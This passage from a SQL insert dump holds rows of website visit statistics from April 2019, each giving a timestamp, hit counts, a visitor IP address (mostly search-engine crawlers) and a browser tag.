55.39.148','other'),(415465,1556319276,1,1,0,0,'66.249.64.60','chrome'),(415466,1556319671,2,2,0,0,'178.154.244.11','other'),(415467,1556319898,1,1,0,0,'66.249.64.31','chrome'),(415468,1556320158,1,1,0,0,'66.249.64.58','chrome'),(415469,1556320258,1,1,0,0,'193.106.30.98','chrome'),(415470,1556324152,1,1,0,0,'66.249.64.58','chrome'),(415471,1556324594,1,1,0,0,'157.55.39.148','other'),(415472,1556325079,2,2,0,0,'207.46.13.181','other'),(415473,1556325637,1,1,0,0,'52.162.161.148','other'),(415474,1556325867,1,1,0,0,'66.249.64.62','chrome'),(415475,1556326283,2,2,0,0,'8.29.198.25','other'),(415476,1556327706,1,0,1,0,'66.249.64.30',''),(415477,1556327951,1,1,0,0,'66.249.64.62','chrome'),(415478,1556328280,1,1,0,0,'178.154.244.11','other'),(415479,1556328364,2,2,0,0,'95.108.181.75','other'),(415480,1556329012,1,1,0,0,'66.249.64.58','chrome'),(415481,1556329810,1,1,0,0,'5.45.207.79','other'),(415482,1556329859,1,1,0,0,'95.163.255.95','other'),(415483,1556330738,1,1,0,0,'50.112.190.136','other'),(415484,1556331175,1,1,0,0,'40.77.167.168','other'),(415485,1556331503,1,1,0,0,'178.154.244.11','other'),(415486,1556331587,1,1,0,0,'5.45.207.19','other'),(415487,1556331910,1,1,0,0,'193.106.30.98','chrome'),(415488,1556332732,1,1,0,0,'66.249.64.30','chrome'),(415489,1556333743,2,2,0,0,'66.249.64.60','chrome'),(415490,1556335502,2,2,0,0,'66.249.64.30','chrome'),(415491,1556335610,1,1,0,0,'40.77.167.47','other'),(415492,1556335816,1,1,0,0,'95.163.255.94','other'),(415493,1556335832,1,1,0,0,'95.163.255.92','other'),(415494,1556335834,1,1,0,0,'95.163.255.172','other'),(415495,1556335955,1,1,0,0,'66.249.64.62','chrome'),(415496,1556336853,1,1,0,0,'40.77.167.31','other'),(415497,1556337123,1,1,0,0,'8.29.198.25','other'),(415498,1556337159,1,1,0,0,'8.29.198.27','other'),(415499,1556337293,2,2,0,0,'34.221.134.75','chrome'),(415500,1556337502,1,1,0,0,'66.249.64.58','chrome'),(415501,1556337512,1,1,0,0,'66.249.64.60','chrome'),(415502,1556337627,1,1,0,0,'40.77.167.47','other'),(415503,1556337785,1,1,0,0,'193.106.30.98','chrome'),(415504,1556338538,1,1,0,0,'95.163.255.179','other'),(415505,1556340237,1,1,0,0,'91.242.162.131','other'),(415506,1556340290,1,1,0,0,'40.77.167.31','other'),(415507,1556340684,1,1,0,0,'178.154.244.11','other'),(415508,1556341906,1,1,0,0,'95.163.255.95','other'),(415509,1556341952,1,1,0,0,'95.163.255.192','other'),(415510,1556342011,1,1,0,0,'78.111.190.108','chrome'),(415511,1556342665,2,2,0,0,'40.77.167.47','other'),(415512,1556343080,1,1,0,0,'185.220.100.253','other'),(415513,1556343225,1,1,0,0,'193.106.30.98','chrome'),(415514,1556343692,1,1,0,0,'40.77.167.42','other'),(415515,1556343748,1,1,0,0,'66.249.64.31','chrome'),(415516,1556344303,1,1,0,0,'207.46.13.124','other'),(415517,1556344318,1,1,0,0,'87.250.224.64','other'),(415518,1556344546,1,1,0,0,'95.108.181.54','other'),(415519,1556345270,1,1,0,0,'62.149.15.172','chrome'),(415520,1556347044,1,1,0,0,'46.211.132.171','chrome'),(415521,1556347964,1,1,0,0,'8.29.198.25','other'),(415522,1556348010,1,1,0,0,'8.29.198.26','other'),(415523,1556348693,1,1,0,0,'193.106.30.98','chrome'),(415524,1556348923,2,2,0,0,'40.77.167.42','other'),(415525,1556351166,1,1,0,0,'91.196.178.58','chrome'),(415526,1556351467,1,1,0,0,'207.46.13.124','other'),(415527,1556352074,1,1,0,0,'157.55.39.235','other'),(415528,1556352933,1,1,0,0,'5.45.207.79','other'),(415529,1556353692,1,1,0,0,'157.55.39.167','other'),(415530,1556354347,1,1,0,0,'95.220.209.64','chrome'),(415531,1556355418,1,1,0,0,'13.66.139.0','other'),(415532,1556355498,2,2,0,0,'66.249.64.60','chrome'),(415533,1556356043,1,1,0,0,'40.77.167.47','other'),(415534,1556356597,1,1,0,0,'95.163.255.175','other'),(415535,1556357212,2,2,0,0,'66.249.64.29','chrome'),(415536,1556357329,1,1,0,0,'5.45.207.79','other'),(415537,1556357430,2,2,0,0,'87.250.224.47','other'),(415538,1556357577,1,1,0,0,'37.9.113.148','other'),(415539,1556358299,1,1,0,0,'52.53.201.78','chrome'),(415540,1556358360,1,1,0,0,'95.163.255.187','other'),(415541,1556358382,1,1,0,0,'178.154.244.11','other'),(415542,1556358625,1,1,0,0,'5.45.207.79','other'),(415543,1556358795,2,2,0,0,'8.29.198.26','other'),(415544,1556359193,1,1,0,0,'157.55.39.167','other'),(415545,1556360051,1,1,0,0,'109.74.154.72','chrome'),(415546,1556360662,1,1,0,0,'46.119.123.213','chrome'),(415547,1556361276,1,1,0,0,'157.55.39.147','other'),(415548,1556363448,1,1,0,0,'157.55.39.147','other'),(415549,1556364214,1,1,0,0,'40.77.167.47','other'),(415550,1556364491,3,3,0,0,'66.249.64.60','chrome'),(415551,1556364591,1,1,0,0,'66.249.64.30','chrome'),(415552,1556365043,1,1,0,0,'157.55.39.147','other'),(415553,1556365087,2,2,0,0,'66.249.64.62','chrome'),(415554,1556365102,1,1,0,0,'66.249.64.58','chrome'),(415555,1556365407,1,1,0,0,'157.55.39.167','other'),(415556,1556365850,1,1,0,0,'157.55.39.151','other'),(415557,1556366265,2,2,0,0,'66.249.64.58','chrome'),(415558,1556366395,1,1,0,0,'141.8.142.103','other'),(415559,1556366956,1,1,0,0,'66.249.64.62','chrome'),(415560,1556367024,1,1,0,0,'5.45.207.79','other'),(415561,1556367049,1,1,0,0,'66.249.64.60','chrome'),(415562,1556367075,1,1,0,0,'46.166.190.148','other'),(415563,1556367949,1,1,0,0,'193.106.30.98','chrome'),(415564,1556369258,1,1,0,0,'95.220.20.46','msie'),(415565,1556369365,1,1,0,0,'66.249.64.58','chrome'),(415566,1556369368,1,1,0,0,'66.249.64.31','chrome'),(415567,1556369638,2,2,0,0,'8.29.198.25','other'),(415568,1556369863,3,3,0,0,'91.196.178.104','chrome'),(415569,1556370059,1,1,0,0,'157.55.39.232','other'),(415570,1556370466,1,1,0,0,'66.249.64.58','chrome'),(415571,1556370675,1,1,0,0,'40.77.167.0','other'),(415572,1556370685,1,1,0,0,'66.249.64.30','chrome'),(415573,1556370963,5,5,0,0,'91.196.178.104','chrome'),(415574,1556371352,1,1,0,0,'66.249.64.29','chrome'),(415575,1556371679,2,2,0,0,'66.249.64.58','chrome'),(415576,1556372949,1,1,0,0,'66.249.64.62','chrome'),(415577,1556372960,1,1,0,0,'66.249.64.60','chrome'),(415578,1556373506,1,1,0,0,'66.249.64.58','chrome'),(415579,1556374187,1,1,0,0,'157.55.39.147','other'),(415580,1556374479,1,1,0,0,'66.249.64.31','chrome'),(415581,1556375440,1,1,0,0,'66.249.64.60','chrome'),(415582,1556375774,1,1,0,0,'40.77.167.0','other'),(415583,1556375837,1,1,0,0,'157.55.39.151','other'),(415584,1556375890,1,1,0,0,'5.45.207.19','other'),(415585,1556375957,1,1,0,0,'87.250.224.47','other'),(415586,1556376035,1,1,0,0,'213.180.203.40','other'),(415587,1556376042,1,1,0,0,'178.154.244.11','other'),(415588,1556376498,1,1,0,0,'87.250.224.64','other'),(415589,1556376696,1,1,0,0,'87.250.224.107','other'),(415590,1556376774,1,1,0,0,'207.46.13.127','other'),(415591,1556376783,3,3,0,0,'66.249.64.29','chrome'),(415592,1556376916,1,1,0,0,'40.77.167.0','other'),(415593,1556376935,1,1,0,0,'213.180.203.9','other'),(415594,1556377006,1,1,0,0,'5.45.207.19','other'),(415595,1556377154,1,1,0,0,'157.55.39.147','other'),(415596,1556378040,1,1,0,0,'95.163.255.177','other'),(415597,1556378359,2,2,0,0,'157.55.39.151','other'),(415598,1556378659,1,1,0,0,'66.249.64.29','chrome'),(415599,1556379498,1,1,0,0,'5.45.207.19','other'),(415600,1556379563,1,1,0,0,'40.77.167.0','other'),(415601,1556379919,2,2,0,0,'157.55.39.147','other'),(415602,1556380469,1,1,0,0,'40.77.167.0','other'),(415603,1556380470,1,1,0,0,'8.29.198.26','other'),(415604,1556380530,1,1,0,0,'8.29.198.25','other'),(415605,1556382957,1,1,0,0,'95.163.255.93','other'),(415606,1556383030,1,1,0,0,'95.163.255.94','other'),(415607,1556383421,1,1,0,0,'178.154.171.17','other'),(415608,1556383653,1,1,0,0,'46.211.109.162','chrome'),(415609,1556383823,1,1,0,0,'157.55.39.147','other'),(415610,1556384784,1,1,0,0,'193.106.30.98','chrome'),(415611,1556386071,1,1,0,0,'157.55.39.147','other'),(415612,1556386172,1,1,0,0,'141.8.142.103','other'),(415613,1556386456,1,1,0,0,'95.163.255.162','other'),(415614,1556386875,1,1,0,0,'13.66.139.0','other'),(415615,1556387032,2,2,0,0,'93.74.244.138','chrome'),(415616,1556387044,1,1,0,0,'207.46.13.127','other'),(415617,1556388733,1,1,0,0,'95.163.255.99','other'),(415618,1556389343,1,1,0,0,'40.77.167.0','other'),(415619,1556389661,1,1,0,0,'87.250.224.47','other'),(415620,1556390471,1,1,0,0,'141.8.142.103','other'),(415621,1556390521,1,1,0,0,'207.46.13.127','other'),(415622,1556390744,2,2,0,0,'157.55.39.147','other'),(415623,1556390953,1,1,0,0,'5.45.207.19','other'),(415624,1556391312,2,2,0,0,'8.29.198.25','other'),(415625,1556391714,1,1,0,0,'193.106.30.98','chrome'),(415626,1556391939,1,1,0,0,'66.249.64.31','chrome'),(415627,1556392020,1,1,0,0,'207.46.13.127','other'),(415628,1556392163,1,1,0,0,'157.55.39.175','other'),(415629,1556392468,1,1,0,0,'178.255.215.94','other'),(415630,1556392567,2,2,0,0,'178.154.244.11','other'),(415631,1556392839,1,1,0,0,'40.77.167.104','other'),(415632,1556392882,1,1,0,0,'5.45.207.19','other'),(415633,1556393526,1,1,0,0,'207.46.13.127','other'),(415634,1556393528,1,1,0,0,'178.154.244.11','other'),(415635,1556393936,1,1,0,0,'37.115.125.91','chrome'),(415636,1556394753,1,1,0,0,'46.211.150.102','chrome'),(415637,1556396191,1,1,0,0,'40.77.167.104','other'),(415638,1556396274,1,1,0,0,'37.115.125.91','chrome'),(415639,1556396327,1,1,0,0,'87.250.224.47','other'),(415640,1556396621,1,1,0,0,'5.45.207.8','other'),(415641,1556397157,1,1,0,0,'66.249.64.58','chrome'),(415642,1556399440,1,1,0,0,'157.55.39.175','other'),(415643,1556399591,1,1,0,0,'178.154.244.11','other'),(415644,1556400432,1,1,0,0,'157.55.39.61','other'),(415645,1556400497,1,1,0,0,'95.163.255.97','other'),(415646,1556400730,1,1,0,0,'180.76.15.17','other'),(415647,1556400803,1,1,0,0,'95.163.255.174','other'),(415648,1556401075,1,1,0,0,'157.55.39.246','other'),(415649,1556402042,1,1,0,0,'37.53.230.235','chrome'),(415650,1556402155,1,1,0,0,'8.29.198.25','other'),(415651,1556402177,1,1,0,0,'37.9.113.148','other'),(415652,1556402217,1,1,0,0,'8.29.198.26','other'),(415653,1556402421,1,1,0,0,'5.255.253.38','other'),(415654,1556402517,1,1,0,0,'95.108.213.4','other'),(415655,1556402882,1,1,0,0,'157.55.39.97','other'),(415656,1556403482,1,1,0,0,'66.249.64.30','chrome'),(415657,1556403824,1,1,0,0,'207.46.13.86','other'),(415658,1556404220,2,2,0,0,'157.55.39.246','other'),(415659,1556404895,1,1,0,0,'66.249.64.29','chrome'),(415660,1556404983,1,1,0,0,'66.249.64.31','chrome'),(415661,1556406111,1,1,0,0,'157.55.39.61','other'),(415662,1556406912,1,1,0,0,'207.46.13.86','other'),(415663,1556407632,1,1,0,0,'66.249.64.31','chrome'),(415664,1556407998,1,1,0,0,'157.55.39.213','other'),(415665,1556408587,1,1,0,0,'5.45.207.79','other'),(415666,1556408748,1,1,0,0,'87.250.224.107','other'),(415667,1556408901,1,1,0,0,'87.250.224.64','other'),(415668,1556409043,1,1,0,0,'37.9.113.148','other'),(415669,1556409519,1,1,0,0,'95.163.255.180','other'),(415670,1556409552,2,2,0,0,'157.55.39.61','other'),(415671,1556409817,1,1,0,0,'157.55.39.85','other'),(415672,1556410060,1,1,0,0,'178.154.244.11','other'),(415673,1556410933,1,1,0,0,'157.55.39.213','other'),(415674,1556411018,1,1,0,0,'95.163.255.98','other'),(415675,1556411131,1,1,0,0,'157.55.39.85','other'),(415676,1556412985,1,1,0,0,'8.29.198.27','other'),(415677,1556413055,1,1,0,0,'8.29.198.25','other'),(415678,1556413368,1,1,0,0,'95.132.58.66','chrome'),(415679,1556414353,1,1,0,0,'157.55.39.213','other'),(415680,1556416229,2,2,0,0,'40.77.167.69','other'),(415681,1556416243,1,1,0,0,'193.106.30.98','chrome'),(415682,1556416531,1,1,0,0,'178.154.244.11','other'),(415683,1556416625,1,1,0,0,'141.8.142.103','other'),(415684,1556416640,1,1,0,0,'66.249.64.30','chrome'),(415685,1556416757,1,1,0,0,'95.108.213.4','other'),(415686,1556417325,1,1,0,0,'95.163.255.99','other'),(415687,1556417334,1,1,0,0,'157.55.39.213','other'),(415688,1556417564,1,1,0,0,'95.163.255.153','other'),(415689,1556418180,2,2,0,0,'95.163.255.98','other'),(415690,1556418619,1,1,0,0,'157.55.39.158','other'),(415691,1556418790,1,1,0,0,'207.46.13.201','other'),(415692,1556420163,1,1,0,0,'66.249.64.58','chrome'),(415693,1556420201,2,2,0,0,'54.200.82.127','chrome'),(415694,1556420286,1,1,0,0,'207.46.13.201','other'),(415695,1556420305,1,1,0,0,'37.9.113.103','other'),(415696,1556420388,1,1,0,0,'178.154.244.11','other'),(415697,1556420810,1,1,0,0,'40.77.169.26','other'),(415698,1556421239,1,1,0,0,'66.249.64.29','chrome'),(415699,1556421264,1,1,0,0,'46.119.123.213','chrome'),(415700,1556421833,1,1,0,0,'157.55.39.213','other'),(415701,1556422014,1,1,0,0,'66.249.64.31','chrome'),(415702,1556422503,1,1,0,0,'66.249.64.30','chrome'),(415703,1556422963,1,1,0,0,'95.163.255.164','other'),(415704,1556423057,1,1,0,0,'178.154.244.49','other'),(415705,1556423240,1,1,0,0,'5.45.207.79','other'),(415706,1556423572,1,1,0,0,'141.8.142.103','other'),(415707,1556423576,56,56,0,0,'5.9.88.113','other'),(415708,1556423809,2,2,0,0,'8.29.198.27','other'),(415709,1556423811,1,1,0,0,'66.249.64.60','chrome'),(415710,1556424027,1,1,0,0,'207.46.13.201','other'),(415711,1556424086,1,1,0,0,'207.46.13.175','other'),(415712,1556425093,1,1,0,0,'66.249.64.31','chrome'),(415713,1556425581,1,1,0,0,'91.209.11.236','other'),(415714,1556426475,1,1,0,0,'178.154.171.27','other'),(415715,1556426630,1,1,0,0,'141.8.183.23','other'),(415716,1556426639,1,1,0,0,'66.249.64.30','chrome'),(415717,1556427500,1,1,0,0,'178.154.244.11','other'),(415718,1556428079,1,1,0,0,'207.46.13.201','other'),(415719,1556428414,1,1,0,0,'66.249.64.62','chrome'),(415720,1556428541,1,1,0,0,'193.106.30.98','chrome'),(415721,1556428610,1,1,0,0,'66.249.64.30','chrome'),(415722,1556428983,1,1,0,0,'95.163.255.95','other'),(415723,1556429060,1,1,0,0,'62.210.37.82','other'),(415724,1556429593,1,1,0,0,'207.46.13.201','other'),(415725,1556430067,1,1,0,0,'13.66.139.0','other'),(415726,1556430174,1,1,0,0,'95.163.255.167','other'),(415727,1556430436,13,13,0,0,'157.55.39.213','other'),(415728,1556430711,5,5,0,0,'207.46.13.175','other'),(415729,1556430730,7,7,0,0,'207.46.13.201','other'),(415730,1556430740,8,8,0,0,'157.55.39.189','other'),(415731,1556430938,1,1,0,0,'178.154.244.11','other'),(415732,1556430996,1,1,0,0,'141.8.142.103','other'),(415733,1556431548,1,1,0,0,'5.45.207.19','other'),(415734,1556431837,1,1,0,0,'46.119.123.213','chrome'),(415735,1556432701,1,1,0,0,'5.45.207.79','other'),(415736,1556432807,1,1,0,0,'66.249.64.31','chrome'),(415737,1556433767,1,1,0,0,'157.55.39.189','other'),(415738,1556434552,1,1,0,0,'95.163.255.179','other'),(415739,1556434556,1,1,0,0,'95.163.255.196','other'),(415740,1556434629,3,3,0,0,'94.130.119.20','firefox'),(415741,1556434641,1,1,0,0,'8.29.198.27','other'),(415742,1556434719,1,1,0,0,'8.29.198.25','other'),(415743,1556434981,1,1,0,0,'207.46.13.175','other'),(415744,1556436455,1,1,0,0,'66.249.64.31','chrome'),(415745,1556436711,1,1,0,0,'157.55.39.213','other'),(415746,1556436896,1,1,0,0,'66.249.64.30','chrome'),(415747,1556437453,1,1,0,0,'207.46.13.175','other'),(415748,1556438314,1,1,0,0,'207.46.13.53','other'),(415749,1556438818,1,1,0,0,'157.55.39.189','other'),(415750,1556439229,2,2,0,0,'141.8.142.103','other'),(415751,1556439250,2,2,0,0,'5.45.207.79','other'),(415752,1556439275,1,1,0,0,'5.45.207.19','other'),(415753,1556439358,1,1,0,0,'207.46.13.53','other'),(415754,1556439443,2,2,0,0,'178.154.244.11','other'),(415755,1556440595,1,1,0,0,'66.249.64.30','chrome'),(415756,1556440851,1,1,0,0,'207.46.13.175','other'),(415757,1556440984,1,0,1,0,'66.249.64.31',''),(415758,1556441515,1,1,0,0,'95.163.255.96','other'),(415759,1556442244,1,1,0,0,'178.154.244.11','other'),(415760,1556442367,1,1,0,0,'31.184.238.248','chrome'),(415761,1556442790,1,1,0,0,'195.154.242.189','firefox'),(415762,1556442859,1,1,0,0,'207.46.13.40','other'),(415763,1556442920,2,2,0,0,'207.46.13.53','other'),(415764,1556443542,1,1,0,0,'66.249.64.60','chrome'),(415765,1556443859,1,1,0,0,'95.163.255.162','other'),(415766,1556444103,1,1,0,0,'40.77.167.77','other'),(415767,1556444217,1,1,0,0,'91.209.11.236','other'),(415768,1556445199,1,1,0,0,'141.8.142.108','other'),(415769,1556445374,1,1,0,0,'207.46.13.53','other'),(415770,1556445490,1,1,0,0,'8.29.198.26','other'),(415771,1556445544,1,1,0,0,'66.249.64.29','chrome'),(415772,1556445548,1,1,0,0,'8.29.198.25','other'),(415773,1556445800,1,1,0,0,'180.76.15.8','other'),(415774,1556446438,1,1,0,0,'109.74.154.72','chrome'),(415775,1556446921,2,2,0,0,'207.46.13.40','other'),(415776,1556447034,1,1,0,0,'58.250.125.74','other'),(415777,1556447883,1,1,0,0,'66.249.64.29','chrome'),(415778,1556448142,1,1,0,0,'91.209.11.236','other'),(415779,1556448272,1,1,0,0,'40.77.167.3','other'),(415780,1556448632,1,1,0,0,'213.180.203.17','other'),(415781,1556448794,1,1,0,0,'37.9.113.148','other'),(415782,1556449472,1,1,0,0,'66.249.64.60','chrome'),(415783,1556450119,1,1,0,0,'66.249.64.62','chrome'),(415784,1556450374,1,1,0,0,'178.154.244.11','other'),(415785,1556450402,1,1,0,0,'40.77.167.164','other'),(415786,1556451121,1,1,0,0,'91.196.179.33','chrome'),(415787,1556451388,1,1,0,0,'66.249.64.30','chrome'),(415788,1556452037,1,1,0,0,'5.45.207.19','other'),(415789,1556452090,1,1,0,0,'178.154.244.11','other'),(415790,1556452095,1,1,0,0,'95.163.255.195','other'),(415791,1556452256,1,1,0,0,'5.45.207.79','other'),(415792,1556452599,1,1,0,0,'66.249.64.60','chrome'),(415793,1556452964,1,1,0,0,'193.106.30.98','chrome'),(415794,1556453117,1,1,0,0,'40.77.167.3','other'),(415795,1556453731,1,1,0,0,'62.122.92.83','chrome'),(415796,1556453763,1,1,0,0,'40.77.167.164','other'),(415797,1556454840,1,1,0,0,'5.45.207.79','other'),(415798,1556455002,1,1,0,0,'95.108.181.54','other'),(415799,1556455128,1,1,0,0,'5.45.207.19','other'),(415800,1556455155,1,1,0,0,'157.55.39.218','other'),(415801,1556455427,1,1,0,0,'40.77.167.95','other'),(415802,1556455687,1,1,0,0,'87.250.224.65','other'),(415803,1556455945,1,1,0,0,'40.77.167.3','other'),(415804,1556456302,1,1,0,0,'66.249.64.30','chrome'),(415805,1556456327,2,2,0,0,'8.29.198.25','other'),(415806,1556456517,1,1,0,0,'91.196.178.182','chrome'),(415807,1556456521,1,1,0,0,'40.77.167.95','other'),(415808,1556457590,1,1,0,0,'141.8.142.162','other'),(415809,1556458141,1,1,0,0,'66.249.64.30','chrome'),(415810,1556458496,1,1,0,0,'157.55.39.218','other'),(415811,1556459166,1,1,0,0,'66.249.64.62','chrome'),(415812,1556459762,1,1,0,0,'141.8.142.103','other'),(415813,1556460436,1,1,0,0,'95.163.255.92','other'),(415814,1556460643,1,1,0,0,'178.154.244.65','other'),(415815,1556461505,2,2,0,0,'157.55.39.218','other'),(415816,1556461632,1,1,0,0,'52.70.146.155','other'),(415817,1556462474,1,1,0,0,'157.55.39.218','other'),(415818,1556463029,1,1,0,0,'157.55.39.95','other'),(415819,1556463418,1,1,0,0,'141.8.142.103','other'),(415820,1556463473,1,1,0,0,'207.46.13.186','other'),(415821,1556463556,1,1,0,0,'66.249.64.31','chrome'),(415822,1556464067,1,1,0,0,'95.163.255.97','other'),(415823,1556464542,1,1,0,0,'5.45.207.19','other'),(415824,1556464987,1,1,0,0,'157.55.39.175','other'),(415825,1556465567,1,1,0,0,'95.163.255.98','other'),(415826,1556465906,1,1,0,0,'207.46.13.99','other'),(415827,1556465940,1,1,0,0,'180.76.15.148','other'),(415828,1556466019,1,1,0,0,'157.55.39.245','other'),(415829,1556466474,1,1,0,0,'95.163.255.175','other'),(415830,1556466491,1,1,0,0,'95.163.255.179','other'),(415831,1556466927,1,1,0,0,'193.106.30.98','chrome'),(415832,1556467166,1,1,0,0,'8.29.198.26','other'),(415833,1556467172,1,1,0,0,'178.154.244.21','other'),(415834,1556467216,1,1,0,0,'8.29.198.25','other'),(415835,1556467385,1,1,0,0,'5.255.253.38','other'),(415836,1556468148,1,1,0,0,'157.55.39.249','other'),(415837,1556469023,1,1,0,0,'157.55.39.173','other'),(415838,1556469232,111,111,0,0,'207.46.13.99','other'),(415839,1556469718,98,98,0,0,'157.55.39.249','other'),(415840,1556469865,120,120,0,0,'40.77.167.151','other'),(415841,1556469963,1,1,0,0,'87.250.224.118','other'),(415842,1556469993,2,2,0,0,'178.154.200.8','other'),(415843,1556470069,134,134,0,0,'157.55.39.173','other'),(415844,1556470142,1,1,0,0,'95.108.213.4','other'),(415845,1556471204,1,1,0,0,'95.163.255.93','other'),(415846,1556471665,1,1,0,0,'193.106.30.98','chrome'),(415847,1556471708,1,1,0,0,'207.46.13.99','other'),(415848,1556472164,1,1,0,0,'82.145.210.96','other'),(415849,1556472399,1,1,0,0,'40.77.167.46','other'),(415850,1556473097,1,1,0,0,'95.108.213.4','other'),(415851,1556473100,1,1,0,0,'95.108.181.94','other'),(415852,1556474973,1,1,0,0,'207.46.13.8','other'),(415853,1556475062,1,1,0,0,'93.72.131.1','chrome'),(415854,1556475761,1,1,0,0,'141.8.183.11','other'),(415855,1556476272,1,1,0,0,'40.77.167.219','other'),(415856,1556476432,1,1,0,0,'207.46.13.99','other'),(415857,1556477599,1,1,0,0,'207.46.13.8','other'),(415858,1556477999,2,2,0,0,'8.29.198.27','other'),(415859,1556478410,1,1,0,0,'193.106.30.98','chrome'),(415860,1556478665,1,1,0,0,'87.250.224.47','other'),(415861,1556478976,1,1,0,0,'46.96.25.154','chrome'),(415862,1556479020,1,1,0,0,'180.76.15.147','other'),(415863,1556479026,1,1,0,0,'5.45.207.79','other'),(415864,1556479035,1,1,0,0,'157.55.39.124','other'),(415865,1556479404,1,1,0,0,'141.8.142.162','other'),(415866,1556479790,1,1,0,0,'37.9.113.148','other'),(415867,1556480776,1,1,0,0,'66.249.64.29','chrome'),(415868,1556480967,1,1,0,0,'157.55.39.249','other'),(415869,1556481019,1,1,0,0,'157.55.39.124','other'),(415870,1556481021,1,1,0,0,'180.76.15.163','other'),(415871,1556482015,1,1,0,0,'87.250.224.107','other'),(415872,1556482350,1,1,0,0,'95.163.255.99','other'),(415873,1556482482,1,1,0,0,'87.250.224.47','other'),(415874,1556482505,1,1,0,0,'37.9.113.20','other'),(415875,1556482519,1,1,0,0,'5.45.207.79','other'),(415876,1556482520,1,1,0,0,'213.180.203.9','other'),(415877,1556483462,1,1,0,0,'66.249.64.30','chrome'),(415878,1556483487,3,3,0,0,'40.77.167.219','other'),(415879,1556483763,1,1,0,0,'95.163.255.190','other'),(415880,1556484927,1,1,0,0,'66.102.6.95','chrome'),(415881,1556485552,1,1,0,0,'5.45.207.80','other'),(415882,1556486196,1,1,0,0,'40.77.167.219','other'),(415883,1556487003,1,1,0,0,'95.163.255.93','other'),(415884,1556487606,1,1,0,0,'40.77.167.125','other'),(415885,1556488646,1,1,0,0,'141.8.142.162','other'),(415886,1556488847,1,1,0,0,'8.29.198.25','other'),(415887,1556488888,1,1,0,0,'8.29.198.26','other'),(415888,1556488894,1,1,0,0,'37.9.113.20','other'),(415889,1556489430,1,1,0,0,'37.9.113.148','other'),(415890,1556489492,1,1,0,0,'178.154.171.69','other'),(415891,1556490180,1,1,0,0,'66.249.64.29','chrome'),(415892,1556490540,3,3,0,0,'157.55.39.124','other'),(415893,1556490681,1,1,0,0,'66.249.64.31','chrome'),(415894,1556490748,1,1,0,0,'40.77.167.125','other'),(415895,1556490774,1,1,0,0,'157.55.39.180','other'),(415896,1556491740,2,2,0,0,'66.249.64.58','chrome'),(415897,1556491831,1,1,0,0,'87.250.224.107','other'),(415898,1556492021,2,2,0,0,'5.255.253.38','other'),(415899,1556492065,1,1,0,0,'213.180.203.23','other'),(415900,1556492291,1,1,0,0,'141.8.142.144','other'),(415901,1556492669,1,1,0,0,'141.8.142.108','other'),(415902,1556492672,1,1,0,0,'178.154.171.27','other'),(415903,1556492868,1,1,0,0,'207.46.13.108','other'),(415904,1556492923,3,3,0,0,'40.77.167.125','other'),(415905,1556494121,1,1,0,0,'95.84.145.219','chrome'),(415906,1556494610,1,1,0,0,'157.55.39.93','other'),(415907,1556494628,1,1,0,0,'207.46.13.53','other'),(415908,1556494818,1,1,0,0,'66.249.64.30','chrome'),(415909,1556495019,1,1,0,0,'95.163.255.157','other'),(415910,1556495071,1,1,0,0,'95.163.255.167','other'),(415911,1556495093,1,1,0,0,'141.8.142.162','other'),(415912,1556495214,1,1,0,0,'5.45.207.8','other'),(415913,1556495223,1,1,0,0,'141.8.132.16','other'),(415914,1556495475,1,1,0,0,'66.249.64.60','chrome'),(415915,1556497219,2,2,0,0,'66.249.64.30','chrome'),(415916,1556497442,2,2,0,0,'207.46.13.214','other'),(415917,1556499698,1,1,0,0,'8.29.198.27','other'),(415918,1556499715,1,1,0,0,'8.29.198.25','other'),(415919,1556499813,1,1,0,0,'95.163.255.179','other'),(415920,1556499864,1,1,0,0,'157.55.39.93','other'),(415921,1556500354,1,1,0,0,'66.249.64.62','chrome'),(415922,1556500357,1,1,0,0,'40.77.167.125','other'),(415923,1556500946,1,1,0,0,'95.108.213.50','other'),(415924,1556501219,1,1,0,0,'5.45.207.79','other'),(415925,1556501581,1,1,0,0,'66.249.64.62','chrome'),(415926,1556501858,1,1,0,0,'207.46.13.53','other'),(415927,1556501972,2,2,0,0,'66.249.64.31','chrome'),(415928,1556502798,1,1,0,0,'95.163.255.193','other'),(415929,1556502832,1,1,0,0,'95.163.255.183','other'),(415930,1556502853,1,1,0,0,'141.8.183.23','other'),(415931,1556502879,1,1,0,0,'40.77.167.112','other'),(415932,1556503273,1,1,0,0,'66.249.64.31','chrome'),(415933,1556504027,1,1,0,0,'37.9.113.20','other'),(415934,1556504117,1,1,0,0,'178.154.171.27','other'),(415935,1556504167,1,1,0,0,'213.180.203.40','other'),(415936,1556504262,1,1,0,0,'87.250.224.47','other'),(415937,1556504577,1,1,0,0,'66.249.64.62','chrome'),(415938,1556504712,1,1,0,0,'66.249.64.29','chrome'),(415939,1556504790,1,1,0,0,'141.8.142.162','other'),(415940,1556504812,1,1,0,0,'87.250.224.81','other'),(415941,1556505575,1,1,0,0,'5.45.207.19','other'),(415942,1556505579,1,1,0,0,'5.45.207.8','other'),(415943,1556506870,1,1,0,0,'66.249.64.58','chrome'),(415944,1556507092,1,1,0,0,'66.249.64.31','chrome'),(415945,1556507164,1,1,0,0,'157.55.39.117','other'),(415946,1556507195,1,1,0,0,'37.9.113.103','other'),(415947,1556507321,1,1,0,0,'87.250.224.47','other'),(415948,1556508564,1,1,0,0,'157.55.39.117','other'),(415949,1556508911,2,2,0,0,'66.249.64.30','chrome'),(415950,1556510088,1,1,0,0,'5.45.207.19','other'),(415951,1556510531,1,1,0,0,'8.29.198.27','other'),(415952,1556510544,1,1,0,0,'8.29.198.25','other'),(415953,1556512236,1,1,0,0,'157.55.39.121','other'),(415954,1556512437,1,1,0,0,'66.249.64.31','chrome'),(415955,1556512440,1,1,0,0,'157.55.39.117','other'),(415956,1556513274,1,1,0,0,'157.55.39.191','other'),(415957,1556514286,2,2,0,0,'157.55.39.191','other'),(415958,1556514398,2,2,0,0,'157.55.39.117','other'),(415959,1556515005,1,1,0,0,'157.55.39.121','other'),(415960,1556515356,1,1,0,0,'157.55.39.117','other'),(415961,1556515433,1,1,0,0,'66.249.64.31','chrome'),(415962,1556515506,1,1,0,0,'109.70.100.27','other'),(415963,1556515870,1,1,0,0,'40.77.167.27','other'),(415964,1556516702,1,1,0,0,'40.77.167.26','other'),(415965,1556516841,1,1,0,0,'87.250.224.64','other'),(415966,1556517150,1,1,0,0,'5.45.207.19','other'),(415967,1556517183,1,1,0,0,'66.249.64.29','chrome'),(415968,1556517219,1,1,0,0,'178.154.244.11','other'),(415969,1556518052,1,1,0,0,'66.249.64.58','chrome'),(415970,1556518200,1,1,0,0,'95.163.255.94','other'),(415971,1556518247,1,1,0,0,'40.77.167.26','other'),(415972,1556518408,1,1,0,0,'40.7